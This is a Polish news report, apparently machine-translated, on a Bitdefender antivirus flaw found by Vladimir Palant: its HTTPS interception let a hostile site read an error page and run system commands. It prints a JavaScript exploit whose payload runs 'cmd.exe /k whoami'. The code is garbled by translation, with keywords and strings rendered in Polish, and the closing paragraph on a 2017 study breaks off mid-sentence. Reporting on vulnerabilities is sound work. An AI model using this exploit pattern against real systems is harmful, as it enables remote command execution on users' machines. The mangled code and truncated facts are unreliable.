Vladimir Palant, twórca Adblock Plus,
Przyczyną problemu jest to, że program antywirusowy Bitdefender lokalnie przechwytuje ruch HTTPS, zastępując oryginalny certyfikat TLS witryny. W systemie Klienta instalowany jest dodatkowy certyfikat główny, który umożliwia ukrycie działania wykorzystywanego systemu kontroli ruchu. Antywirus wcina się w chroniony ruch i wstawia na niektóre strony własny kod JavaScript, aby zaimplementować funkcję Bezpiecznego wyszukiwania, a w przypadku problemów z certyfikatem bezpiecznego połączenia zastępuje zwróconą stronę błędu własną. Ponieważ nowa strona błędu jest obsługiwana w imieniu otwieranego serwera, inne strony na tym serwerze mają pełny dostęp do treści wstawianej przez Bitdefender.
Otwierając witrynę kontrolowaną przez atakującego, witryna ta może wysłać żądanie XMLHttpRequest i podczas odpowiadania udawać problemy z certyfikatem HTTPS, co doprowadzi do zwrócenia strony błędu sfałszowanej przez Bitdefender. Ponieważ strona błędu jest otwierana w kontekście domeny atakującego, może on odczytać zawartość fałszywej strony z parametrami Bitdefendera. Strona dostarczona przez Bitdefender zawiera również klucz sesji, który pozwala na użycie wewnętrznego API Bitdefender do uruchomienia oddzielnej sesji przeglądarki Safepay, określenia dowolnych flag linii poleceń i uruchomienia dowolnych poleceń systemowych przy użyciu prefiksu „--utility-cmd-prefix” flaga. Przykład exploita (param1 i param2 to wartości uzyskane ze strony błędu):
var żądanie = nowe XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Typ zawartości", "aplikacja/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami i echo\"");
Przypomnijmy, że badanie przeprowadzone w 2017 r
Tylko 11 z 26 produktów zapewniało aktualne zestawy szyfrów. 5 systemów nie zweryfikowało certyfikatów (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Produkty Kaspersky Internet Security i Total Security stały się celem ataku
Źródło: opennet.ru